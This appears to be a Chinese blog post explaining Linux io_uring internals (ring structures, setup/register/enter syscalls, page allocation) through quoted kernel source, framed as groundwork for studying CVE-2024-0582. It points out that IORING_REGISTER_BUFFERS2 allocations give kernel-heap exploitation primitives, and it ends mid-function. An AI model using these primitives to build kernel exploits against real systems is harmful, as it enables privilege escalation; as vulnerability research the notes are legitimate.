基本结构

io_uring 结构为两个单向环形队列,分为 Submission Queue (SQ) 和 Completion Queue (CQ) :

内核中使用 io_uring 结构体来保存单个环形队列的 head 和 tail, head 用于出列,tail 用于入列。

1
2
3
4
struct io_uring {
u32 head;
u32 tail;
};

io_uring_sqe 结构体用于表示提交的请求 (Submission Queue Entry)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
/*
* IO submission data structure (Submission Queue Entry)
*/
struct io_uring_sqe {
__u8 opcode; /* type of operation for this sqe */
__u8 flags; /* IOSQE_ flags */
__u16 ioprio; /* ioprio for the request */
__s32 fd; /* file descriptor to do IO on */
union {
__u64 off; /* offset into file */
__u64 addr2;
struct {
__u32 cmd_op;
__u32 __pad1;
};
};
union {
__u64 addr; /* pointer to buffer or iovecs */
__u64 splice_off_in;
struct {
__u32 level;
__u32 optname;
};
};
__u32 len; /* buffer size or number of iovecs */
union {
__u32 rw_flags;
__u32 fsync_flags;
__u16 poll_events; /* compatibility */
__u32 poll32_events; /* word-reversed for BE */
__u32 sync_range_flags;
__u32 msg_flags;
__u32 timeout_flags;
__u32 accept_flags;
__u32 cancel_flags;
__u32 open_flags;
__u32 statx_flags;
__u32 fadvise_advice;
__u32 splice_flags;
__u32 rename_flags;
__u32 unlink_flags;
__u32 hardlink_flags;
__u32 xattr_flags;
__u32 msg_ring_flags;
__u32 uring_cmd_flags;
__u32 waitid_flags;
__u32 futex_flags;
__u32 install_fd_flags;
__u32 nop_flags;
__u32 pipe_flags;
};
__u64 user_data; /* data to be passed back at completion time */
/* pack this to avoid bogus arm OABI complaints */
union {
/* index into fixed buffers, if used */
__u16 buf_index;
/* for grouped buffer selection */
__u16 buf_group;
} __attribute__((packed));
/* personality to use, if used */
__u16 personality;
union {
__s32 splice_fd_in;
__u32 file_index;
__u32 zcrx_ifq_idx;
__u32 optlen;
struct {
__u16 addr_len;
__u16 __pad3[1];
};
struct {
__u8 write_stream;
__u8 __pad4[3];
};
};
union {
struct {
__u64 addr3;
__u64 __pad2[1];
};
struct {
__u64 attr_ptr; /* pointer to attribute information */
__u64 attr_type_mask; /* bit mask of attributes */
};
__u64 optval;
/*
* If the ring is initialized with IORING_SETUP_SQE128, then
* this field is used for 80 bytes of arbitrary command data
*/
__u8 cmd[0];
};
};

io_uring_cqe 结构体表示完成的请求 (Completion Queue Entry)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
* IO completion data structure (Completion Queue Entry)
*/
struct io_uring_cqe {
__u64 user_data; /* sqe->user_data value passed back */
__s32 res; /* result code for this event */
__u32 flags;

/*
* If the ring is initialized with IORING_SETUP_CQE32, then this field
* contains 16-bytes of padding, doubling the size of the CQE.
*/
__u64 big_cqe[];
};

内核中实际会使用 io_rings 结构体存储相应的数据,其中封装了 io_uring、 提交队列 sq、结果队列 cq、cqe 数组

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
/*
* This data is shared with the application through the mmap at offsets
* IORING_OFF_SQ_RING and IORING_OFF_CQ_RING.
*
* The offsets to the member fields are published through struct
* io_sqring_offsets when calling io_uring_setup.
*/
struct io_rings {
/*
* Head and tail offsets into the ring; the offsets need to be
* masked to get valid indices.
*
* The kernel controls head of the sq ring and the tail of the cq ring,
* and the application controls tail of the sq ring and the head of the
* cq ring.
*/
struct io_uring sq, cq;
/*
* Bitmasks to apply to head and tail offsets (constant, equals
* ring_entries - 1)
*/
u32 sq_ring_mask, cq_ring_mask;
/* Ring sizes (constant, power of 2) */
u32 sq_ring_entries, cq_ring_entries;
/*
* Number of invalid entries dropped by the kernel due to
* invalid index stored in array
*
* Written by the kernel, shouldn't be modified by the
* application (i.e. get number of "new events" by comparing to
* cached value).
*
* After a new SQ head value was read by the application this
* counter includes all submissions that were dropped reaching
* the new SQ head (and possibly more).
*/
u32 sq_dropped;
/*
* Runtime SQ flags
*
* Written by the kernel, shouldn't be modified by the
* application.
*
* The application needs a full memory barrier before checking
* for IORING_SQ_NEED_WAKEUP after updating the sq tail.
*/
atomic_t sq_flags;
/*
* Runtime CQ flags
*
* Written by the application, shouldn't be modified by the
* kernel.
*/
u32 cq_flags;
/*
* Number of completion events lost because the queue was full;
* this should be avoided by the application by making sure
* there are not more requests pending than there is space in
* the completion queue.
*
* Written by the kernel, shouldn't be modified by the
* application (i.e. get number of "new events" by comparing to
* cached value).
*
* As completion events come in out of order this counter is not
* ordered with any other data.
*/
u32 cq_overflow;
/*
* Ring buffer of completion events.
*
* The kernel writes completion events fresh every time they are
* produced, so the application is allowed to modify pending
* entries.
*/
struct io_uring_cqe cqes[] ____cacheline_aligned_in_smp;
};

而 io_rings 与 io_uring_sqe 数组以及其他相关数据结构体实际上会被封装到 io_ring_ctx 结构体中,即 io_uring 上下文。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
struct io_ring_ctx {
/* const or read-mostly hot data */
struct {
unsigned int flags;
unsigned int drain_next: 1;
unsigned int restricted: 1;
unsigned int off_timeout_used: 1;
unsigned int drain_active: 1;
unsigned int has_evfd: 1;
/* all CQEs should be posted only by the submitter task */
unsigned int task_complete: 1;
unsigned int lockless_cq: 1;
unsigned int syscall_iopoll: 1;
unsigned int poll_activated: 1;
unsigned int drain_disabled: 1;
unsigned int compat: 1;
unsigned int iowq_limits_set : 1;

struct task_struct *submitter_task;
struct io_rings *rings;
struct percpu_ref refs;

clockid_t clockid;
enum tk_offsets clock_offset;

enum task_work_notify_mode notify_method;
unsigned sq_thread_idle;
} ____cacheline_aligned_in_smp;

/* submission data */
struct {
struct mutex uring_lock;

/*
* Ring buffer of indices into array of io_uring_sqe, which is
* mmapped by the application using the IORING_OFF_SQES offset.
*
* This indirection could e.g. be used to assign fixed
* io_uring_sqe entries to operations and only submit them to
* the queue when needed.
*
* The kernel modifies neither the indices array nor the entries
* array.
*/
u32 *sq_array;
struct io_uring_sqe *sq_sqes;
unsigned cached_sq_head;
unsigned sq_entries;

/*
* Fixed resources fast path, should be accessed only under
* uring_lock, and updated through io_uring_register(2)
*/
atomic_t cancel_seq;

/*
* ->iopoll_list is protected by the ctx->uring_lock for
* io_uring instances that don't use IORING_SETUP_SQPOLL.
* For SQPOLL, only the single threaded io_sq_thread() will
* manipulate the list, hence no extra locking is needed there.
*/
bool poll_multi_queue;
struct io_wq_work_list iopoll_list;

struct io_file_table file_table;
struct io_rsrc_data buf_table;
struct io_alloc_cache node_cache;
struct io_alloc_cache imu_cache;

struct io_submit_state submit_state;

/*
* Modifications are protected by ->uring_lock and ->mmap_lock.
* The flags, buf_pages and buf_nr_pages fields should be stable
* once published.
*/
struct xarray io_bl_xa;

struct io_hash_table cancel_table;
struct io_alloc_cache apoll_cache;
struct io_alloc_cache netmsg_cache;
struct io_alloc_cache rw_cache;
struct io_alloc_cache cmd_cache;

/*
* Any cancelable uring_cmd is added to this list in
* ->uring_cmd() by io_uring_cmd_insert_cancelable()
*/
struct hlist_head cancelable_uring_cmd;
/*
* For Hybrid IOPOLL, runtime in hybrid polling, without
* scheduling time
*/
u64 hybrid_poll_time;
} ____cacheline_aligned_in_smp;
...
}

基本过程

io_uring 的基本流程如下(a3 博客这里是不是弄混了?):

  • SQ 存放用户请求 SQE,用户维护 SQ::Tail
  • 内核从 SQ 读取 SQE,内核维护 SQ::Head
  • 内核完成请求将结果封装到 CQE 并放到 CQ 队列中,内核维护 CQ::Tail
  • 用户读取 CQ 完成感知,用户维护 CQ::Head

数据更新通过 共享内存完成,蒸锅过程采用异步、非阻塞、轮询的思想

io_uring 相关系统调用

io_uring 架构引入三个相关系统调用:

  • io_uring_setup():创建 io_uring 上下文,主要是创建 SQ 和 CQ 队列,并指定 queue 的元素数量;该系统调用会返回一个文件描述符来进行操作
  • io_uring_register():操作用于异步 I/O 的文件或用户缓冲区(files or user buffers),主要有注册(在内核中创建新的缓冲区)、更新(更新缓冲区内容)、注销(释放缓冲区)等操作,已经注册的缓冲区大小无法调整
  • io_uring_enter():提交新的 I/O 请求,可以选择是否等待 I/O 完成

io_uring_setup()

核心处理函数为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
static __cold int io_uring_create(unsigned entries, struct io_uring_params *p,
struct io_uring_params __user *params)
{
struct io_ring_ctx *ctx;
struct io_uring_task *tctx;
struct file *file;
int ret;

ret = io_uring_sanitise_params(p);
if (ret)
return ret;

ret = io_uring_fill_params(entries, p);
if (unlikely(ret))
return ret;

ctx = io_ring_ctx_alloc(p); // 分配 io_ring_ctx,kzalloc,GFP_KERNEL
if (!ctx)
return -ENOMEM;

ctx->clockid = CLOCK_MONOTONIC;
ctx->clock_offset = 0;

if (!(ctx->flags & IORING_SETUP_NO_SQARRAY))
static_branch_inc(&io_key_has_sqarray);

if ((ctx->flags & IORING_SETUP_DEFER_TASKRUN) &&
!(ctx->flags & IORING_SETUP_IOPOLL) &&
!(ctx->flags & IORING_SETUP_SQPOLL))
ctx->task_complete = true;

if (ctx->task_complete || (ctx->flags & IORING_SETUP_IOPOLL))
ctx->lockless_cq = true;

/*
* lazy poll_wq activation relies on ->task_complete for synchronisation
* purposes, see io_activate_pollwq()
*/
if (!ctx->task_complete)
ctx->poll_activated = true;

/*
* When SETUP_IOPOLL and SETUP_SQPOLL are both enabled, user
* space applications don't need to do io completion events
* polling again, they can rely on io_sq_thread to do polling
* work, which can reduce cpu usage and uring_lock contention.
*/
if (ctx->flags & IORING_SETUP_IOPOLL &&
!(ctx->flags & IORING_SETUP_SQPOLL))
ctx->syscall_iopoll = 1;

ctx->compat = in_compat_syscall();
if (!ns_capable_noaudit(&init_user_ns, CAP_IPC_LOCK))
ctx->user = get_uid(current_user());

/*
* For SQPOLL, we just need a wakeup, always. For !SQPOLL, if
* COOP_TASKRUN is set, then IPIs are never needed by the app.
*/
if (ctx->flags & (IORING_SETUP_SQPOLL|IORING_SETUP_COOP_TASKRUN))
ctx->notify_method = TWA_SIGNAL_NO_IPI;
else
ctx->notify_method = TWA_SIGNAL;

/*
* This is just grabbed for accounting purposes. When a process exits,
* the mm is exited and dropped before the files, hence we need to hang
* on to this mm purely for the purposes of being able to unaccount
* memory (locked/pinned vm). It's not used for anything else.
*/
mmgrab(current->mm);
ctx->mm_account = current->mm;

ret = io_allocate_scq_urings(ctx, p); // 分配 io_rings以及页面,这里会有很多内存分配
if (ret)
goto err;

if (!(p->flags & IORING_SETUP_NO_SQARRAY))
p->sq_off.array = (char *)ctx->sq_array - (char *)ctx->rings;

ret = io_sq_offload_create(ctx, p); // 初始化 SQ,主要关于 WQ 和 SQPOOL
if (ret)
goto err;

p->features = IORING_FEAT_SINGLE_MMAP | IORING_FEAT_NODROP |
IORING_FEAT_SUBMIT_STABLE | IORING_FEAT_RW_CUR_POS |
IORING_FEAT_CUR_PERSONALITY | IORING_FEAT_FAST_POLL |
IORING_FEAT_POLL_32BITS | IORING_FEAT_SQPOLL_NONFIXED |
IORING_FEAT_EXT_ARG | IORING_FEAT_NATIVE_WORKERS |
IORING_FEAT_RSRC_TAGS | IORING_FEAT_CQE_SKIP |
IORING_FEAT_LINKED_FILE | IORING_FEAT_REG_REG_RING |
IORING_FEAT_RECVSEND_BUNDLE | IORING_FEAT_MIN_TIMEOUT |
IORING_FEAT_RW_ATTR | IORING_FEAT_NO_IOWAIT;

if (copy_to_user(params, p, sizeof(*p))) {
ret = -EFAULT;
goto err;
}

if (ctx->flags & IORING_SETUP_SINGLE_ISSUER
&& !(ctx->flags & IORING_SETUP_R_DISABLED))
WRITE_ONCE(ctx->submitter_task, get_task_struct(current));

file = io_uring_get_file(ctx); // 获取文件描述符
if (IS_ERR(file)) {
ret = PTR_ERR(file);
goto err;
}

ret = __io_uring_add_tctx_node(ctx);// 分配进程上下文
if (ret)
goto err_fput;
tctx = current->io_uring;

/*
* Install ring fd as the very last thing, so we don't risk someone
* having closed it before we finish setup
*/
if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY)
ret = io_ring_add_registered_file(tctx, file, 0, IO_RINGFD_REG_MAX);
else
ret = io_uring_install_fd(file);
if (ret < 0)
goto err_fput;

trace_io_uring_create(ret, ctx, p->sq_entries, p->cq_entries, p->flags);
return ret;
err:
io_ring_ctx_wait_and_kill(ctx);
return ret;
err_fput:
fput(file);
return ret;
}

在 io_allocate_scq_urings 分配了很多内存结构,主要为:

  • kvmalloc 分配一个指针数组( GFP_KERNEL_ACCOUNT | __GFP_ZERO
  • io_mem_alloc_compound()alloc_pages() 先对齐 order 再 一次性分配指针数组的页面 后进行填充
  • 调用 alloc_pages_bulk_node 进行页面分配(大概是 一张一张分配一整个 page 数组具体的内部没细看
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
static int io_region_allocate_pages(struct io_ring_ctx *ctx,
struct io_mapped_region *mr,
struct io_uring_region_desc *reg,
unsigned long mmap_offset)
{
gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN;
size_t size = (size_t) mr->nr_pages << PAGE_SHIFT;
unsigned long nr_allocated;
struct page **pages;
void *p;

pages = kvmalloc_array(mr->nr_pages, sizeof(*pages), gfp);
if (!pages)
return -ENOMEM;

p = io_mem_alloc_compound(pages, mr->nr_pages, size, gfp);
if (!IS_ERR(p)) {
mr->flags |= IO_REGION_F_SINGLE_REF;
goto done;
}

nr_allocated = alloc_pages_bulk_node(gfp, NUMA_NO_NODE,
mr->nr_pages, pages);
if (nr_allocated != mr->nr_pages) {
if (nr_allocated)
release_pages(pages, nr_allocated);
kvfree(pages);
return -ENOMEM;
}
done:
reg->mmap_offset = mmap_offset;
mr->pages = pages;
return 0;
}

int io_create_region(struct io_ring_ctx *ctx, struct io_mapped_region *mr,
struct io_uring_region_desc *reg,
unsigned long mmap_offset)
{
int nr_pages, ret;
u64 end;

if (WARN_ON_ONCE(mr->pages || mr->ptr || mr->nr_pages))
return -EFAULT;
if (memchr_inv(&reg->__resv, 0, sizeof(reg->__resv)))
return -EINVAL;
if (reg->flags & ~IORING_MEM_REGION_TYPE_USER)
return -EINVAL;
/* user_addr should be set IFF it's a user memory backed region */
if ((reg->flags & IORING_MEM_REGION_TYPE_USER) != !!reg->user_addr)
return -EFAULT;
if (!reg->size || reg->mmap_offset || reg->id)
return -EINVAL;
if ((reg->size >> PAGE_SHIFT) > INT_MAX)
return -E2BIG;
if ((reg->user_addr | reg->size) & ~PAGE_MASK)
return -EINVAL;
if (check_add_overflow(reg->user_addr, reg->size, &end))
return -EOVERFLOW;

nr_pages = reg->size >> PAGE_SHIFT;
if (ctx->user) {
ret = __io_account_mem(ctx->user, nr_pages);
if (ret)
return ret;
}
mr->nr_pages = nr_pages;

if (reg->flags & IORING_MEM_REGION_TYPE_USER)
ret = io_region_pin_pages(ctx, mr, reg); // 用户应用分配页面,可直接供内核使用
else
ret = io_region_allocate_pages(ctx, mr, reg, mmap_offset); // 内核提供页面
if (ret)
goto out_free;

ret = io_region_init_ptr(mr);
if (ret)
goto out_free;
return 0;
out_free:
io_free_region(ctx, mr);
return ret;
}


static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx,
struct io_uring_params *p)
{
struct io_uring_region_desc rd;
struct io_rings *rings;
size_t size, sq_array_offset;
int ret;

/* make sure these are sane, as we already accounted them */
ctx->sq_entries = p->sq_entries;
ctx->cq_entries = p->cq_entries;

size = rings_size(ctx->flags, p->sq_entries, p->cq_entries,
&sq_array_offset);
if (size == SIZE_MAX)
return -EOVERFLOW;

memset(&rd, 0, sizeof(rd));
rd.size = PAGE_ALIGN(size);
if (ctx->flags & IORING_SETUP_NO_MMAP) {
rd.user_addr = p->cq_off.user_addr;
rd.flags |= IORING_MEM_REGION_TYPE_USER;
}
ret = io_create_region(ctx, &ctx->ring_region, &rd, IORING_OFF_CQ_RING);
if (ret)
return ret;
ctx->rings = rings = io_region_get_ptr(&ctx->ring_region);

if (!(ctx->flags & IORING_SETUP_NO_SQARRAY))
ctx->sq_array = (u32 *)((char *)rings + sq_array_offset);
rings->sq_ring_mask = p->sq_entries - 1;
rings->cq_ring_mask = p->cq_entries - 1;
rings->sq_ring_entries = p->sq_entries;
rings->cq_ring_entries = p->cq_entries;

if (p->flags & IORING_SETUP_SQE128)
size = array_size(2 * sizeof(struct io_uring_sqe), p->sq_entries);
else
size = array_size(sizeof(struct io_uring_sqe), p->sq_entries);
if (size == SIZE_MAX) {
io_rings_free(ctx);
return -EOVERFLOW;
}

memset(&rd, 0, sizeof(rd));
rd.size = PAGE_ALIGN(size);
if (ctx->flags & IORING_SETUP_NO_MMAP) {
rd.user_addr = p->sq_off.user_addr;
rd.flags |= IORING_MEM_REGION_TYPE_USER;
}
ret = io_create_region(ctx, &ctx->sq_region, &rd, IORING_OFF_SQES);
if (ret) {
io_rings_free(ctx);
return ret;
}
ctx->sq_sqes = io_region_get_ptr(&ctx->sq_region);
return 0;
}

io_uring_register()

定义了相关 syscall,调用了函数 __io_uring_register。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)
{
struct io_ring_ctx *ctx;
long ret = -EBADF;
struct file *file;
bool use_registered_ring;

use_registered_ring = !!(opcode & IORING_REGISTER_USE_REGISTERED_RING);
opcode &= ~IORING_REGISTER_USE_REGISTERED_RING;

if (opcode >= IORING_REGISTER_LAST)
return -EINVAL;

if (fd == -1)
return io_uring_register_blind(opcode, arg, nr_args);

file = io_uring_register_get_file(fd, use_registered_ring);
if (IS_ERR(file))
return PTR_ERR(file);
ctx = file->private_data;

mutex_lock(&ctx->uring_lock);
ret = __io_uring_register(ctx, opcode, arg, nr_args);

trace_io_uring_register(ctx, opcode, ctx->file_table.data.nr,
ctx->buf_table.nr, ret);
mutex_unlock(&ctx->uring_lock);

fput(file);
return ret;
}

__io_uring_register 函数内容如下,根据 opcode 定义了各种对 io_uring的操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;

/*
* We don't quiesce the refs for register anymore and so it can't be
* dying as we're holding a file ref here.
*/
if (WARN_ON_ONCE(percpu_ref_is_dying(&ctx->refs)))
return -ENXIO;

if (ctx->submitter_task && ctx->submitter_task != current)
return -EEXIST;

if (ctx->restricted) {
opcode = array_index_nospec(opcode, IORING_REGISTER_LAST);
if (!test_bit(opcode, ctx->restrictions.register_op))
return -EACCES;
}

switch (opcode) {
case IORING_REGISTER_BUFFERS:
ret = -EFAULT;
if (!arg)
break;
ret = io_sqe_buffers_register(ctx, arg, nr_args, NULL);
break;
case IORING_UNREGISTER_BUFFERS:
ret = -EINVAL;
if (arg || nr_args)
break;
ret = io_sqe_buffers_unregister(ctx);
break;
case IORING_REGISTER_FILES:
ret = -EFAULT;
if (!arg)
break;
ret = io_sqe_files_register(ctx, arg, nr_args, NULL);
break;
....

io_uring_enter()

用户空间进程可以通过 io_uring_enter() 提交新的 I/O 请求(告诉内核我们已经在 SQ 队列提交了 SQE),且可以选择是否等待 I/O 完成等选项,内核会随后进行处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit,
u32, min_complete, u32, flags, const void __user *, argp,
size_t, argsz)
{
struct io_ring_ctx *ctx;
struct file *file;
long ret;

if (unlikely(flags & ~(IORING_ENTER_GETEVENTS | IORING_ENTER_SQ_WAKEUP |
IORING_ENTER_SQ_WAIT | IORING_ENTER_EXT_ARG |
IORING_ENTER_REGISTERED_RING |
IORING_ENTER_ABS_TIMER |
IORING_ENTER_EXT_ARG_REG |
IORING_ENTER_NO_IOWAIT)))
return -EINVAL;

/*
* Ring fd has been registered via IORING_REGISTER_RING_FDS, we
* need only dereference our task private array to find it.
*/
if (flags & IORING_ENTER_REGISTERED_RING) {
struct io_uring_task *tctx = current->io_uring;

if (unlikely(!tctx || fd >= IO_RINGFD_REG_MAX))
return -EINVAL;
fd = array_index_nospec(fd, IO_RINGFD_REG_MAX);
file = tctx->registered_rings[fd];
if (unlikely(!file))
return -EBADF;
} else {
file = fget(fd);
if (unlikely(!file))
return -EBADF;
ret = -EOPNOTSUPP;
if (unlikely(!io_is_uring_fops(file)))
goto out;
}

ctx = file->private_data;
ret = -EBADFD;
if (unlikely(ctx->flags & IORING_SETUP_R_DISABLED))
goto out;

/*
* For SQ polling, the thread will do all submissions and completions.
* Just return the requested submit count, and wake the thread if
* we were asked to.
*/
ret = 0;
if (ctx->flags & IORING_SETUP_SQPOLL) {
if (unlikely(ctx->sq_data->thread == NULL)) {
ret = -EOWNERDEAD;
goto out;
}
if (flags & IORING_ENTER_SQ_WAKEUP)
wake_up(&ctx->sq_data->wait);
if (flags & IORING_ENTER_SQ_WAIT)
io_sqpoll_wait_sq(ctx);

ret = to_submit;
} else if (to_submit) {
ret = io_uring_add_tctx_node(ctx);
if (unlikely(ret))
goto out;

mutex_lock(&ctx->uring_lock);
ret = io_submit_sqes(ctx, to_submit);
if (ret != to_submit) {
mutex_unlock(&ctx->uring_lock);
goto out;
}
if (flags & IORING_ENTER_GETEVENTS) {
if (ctx->syscall_iopoll)
goto iopoll_locked;
/*
* Ignore errors, we'll soon call io_cqring_wait() and
* it should handle ownership problems if any.
*/
if (ctx->flags & IORING_SETUP_DEFER_TASKRUN)
(void)io_run_local_work_locked(ctx, min_complete);
}
mutex_unlock(&ctx->uring_lock);
}

if (flags & IORING_ENTER_GETEVENTS) {
// 等待完成事件
int ret2;

if (ctx->syscall_iopoll) {
/*
* We disallow the app entering submit/complete with
* polling, but we still need to lock the ring to
* prevent racing with polled issue that got punted to
* a workqueue.
*/
mutex_lock(&ctx->uring_lock);
iopoll_locked:
ret2 = io_validate_ext_arg(ctx, flags, argp, argsz);
if (likely(!ret2))
ret2 = io_iopoll_check(ctx, min_complete);
mutex_unlock(&ctx->uring_lock);
} else {
struct ext_arg ext_arg = { .argsz = argsz };

ret2 = io_get_ext_arg(ctx, flags, argp, &ext_arg);
if (likely(!ret2))
ret2 = io_cqring_wait(ctx, min_complete, flags,
&ext_arg);
}

if (!ret) {
ret = ret2;

/*
* EBADR indicates that one or more CQE were dropped.
* Once the user has been informed we can clear the bit
* as they are obviously ok with those drops.
*/
if (unlikely(ret2 == -EBADR))
clear_bit(IO_CHECK_CQ_DROPPED_BIT,
&ctx->check_cq);
}
}
out:
if (!(flags & IORING_ENTER_REGISTERED_RING))
fput(file);
return ret;
}

IORING_REGISTER_PBUF_RING

CVE-2024-0582学习

IORING_REGISTER_BUFFERS2

在获取一个 io_uring 上下文后,我们可以通过 io_uring_register() 系统调用分配一些内核空间并写入数据,这里介绍 IORING_REGISTER_BUFFERS2 opcode:

  • IORING_REGISTER_BUFFERS2:将多个缓冲区提前注册到内核中,供后续直接使用而无需重复传递分配释放
    其本身的原始功能对我们而言是次要的,但其内部实现对我们而言有很多利用点。

分配(GFP_KERNEL_ACCOUNT)

当我们指定 opcode 为 IORING_REGISTER_BUFFERS2 时,内核 io_uring_register 系统调用会执行 io_register_rsrc() 函数,参数则会交由 io_seq_buffers_register() 进行处理:

注:6.13 版本后便不再使用 io_alloc_page_table 函数进行页面内存的分配

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
static __cold void **io_alloc_page_table(size_t size)
{
unsigned i, nr_tables = DIV_ROUND_UP(size, PAGE_SIZE);
size_t init_size = size;
void **table;

table = kcalloc(nr_tables, sizeof(*table), GFP_KERNEL_ACCOUNT);
if (!table)
return NULL;

for (i = 0; i < nr_tables; i++) {
unsigned int this_size = min_t(size_t, size, PAGE_SIZE);

table[i] = kzalloc(this_size, GFP_KERNEL_ACCOUNT);
if (!table[i]) {
io_free_page_table(table, init_size);
return NULL;
}
size -= this_size;
}
return table;
}

__cold static int io_rsrc_data_alloc(struct io_ring_ctx *ctx,
rsrc_put_fn *do_put, u64 __user *utags,
unsigned nr, struct io_rsrc_data **pdata)
{
struct io_rsrc_data *data;
int ret = -ENOMEM;
unsigned i;

data = kzalloc(sizeof(*data), GFP_KERNEL);
if (!data)
return -ENOMEM;
data->tags = (u64 **)io_alloc_page_table(nr * sizeof(data->tags[0][0]));
if (!data->tags) {
kfree(data);
return -ENOMEM;
}

data->nr = nr;
data->ctx = ctx;
data->do_put = do_put;
if (utags) {
ret = -EFAULT;
for (i = 0; i < nr; i++) {
u64 *tag_slot = io_get_tag_slot(data, i);

if (copy_from_user(tag_slot, &utags[i],
sizeof(*tag_slot)))
goto fail;
}
}

atomic_set(&data->refs, 1);
init_completion(&data->done);
*pdata = data;
return 0;
fail:
io_rsrc_data_free(data);
return ret;
}

int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
unsigned int nr_args, u64 __user *tags)
{
struct page *last_hpage = NULL;
struct io_rsrc_data *data;
int i, ret;
struct iovec iov;

BUILD_BUG_ON(IORING_MAX_REG_BUFFERS >= (1u << 16));

if (ctx->user_bufs)
return -EBUSY;
if (!nr_args || nr_args > IORING_MAX_REG_BUFFERS)
return -EINVAL;
ret = io_rsrc_node_switch_start(ctx);
if (ret)
return ret;
ret = io_rsrc_data_alloc(ctx, io_rsrc_buf_put, tags, nr_args, &data);
if (ret)
return ret;
ret = io_buffers_map_alloc(ctx, nr_args);
if (ret) {
io_rsrc_data_free(data);
return ret;
}

for (i = 0; i < nr_args; i++, ctx->nr_user_bufs++) {
if (arg) {
ret = io_copy_iov(ctx, &iov, arg, i);
if (ret)
break;
ret = io_buffer_validate(&iov);
if (ret)
break;
} else {
memset(&iov, 0, sizeof(iov));
}

if (!iov.iov_base && *io_get_tag_slot(data, i)) {
ret = -EINVAL;
break;
}

ret = io_sqe_buffer_register(ctx, &iov, &ctx->user_bufs[i],
&last_hpage);
if (ret)
break;
}

WARN_ON_ONCE(ctx->buf_data);

ctx->buf_data = data;
if (ret)
__io_sqe_buffers_unregister(ctx);
else
io_rsrc_node_switch(ctx, NULL);
return ret;
}

__cold int io_register_rsrc(struct io_ring_ctx *ctx, void __user *arg,
unsigned int size, unsigned int type)
{
struct io_uring_rsrc_register rr;

/* keep it extendible */
if (size != sizeof(rr))
return -EINVAL;

memset(&rr, 0, sizeof(rr));
if (copy_from_user(&rr, arg, size))
return -EFAULT;
if (!rr.nr || rr.resv2)
return -EINVAL;
if (rr.flags & ~IORING_RSRC_REGISTER_SPARSE)
return -EINVAL;

switch (type) {
case IORING_RSRC_FILE:
if (rr.flags & IORING_RSRC_REGISTER_SPARSE && rr.data)
break;
return io_sqe_files_register(ctx, u64_to_user_ptr(rr.data),
rr.nr, u64_to_user_ptr(rr.tags));
case IORING_RSRC_BUFFER:
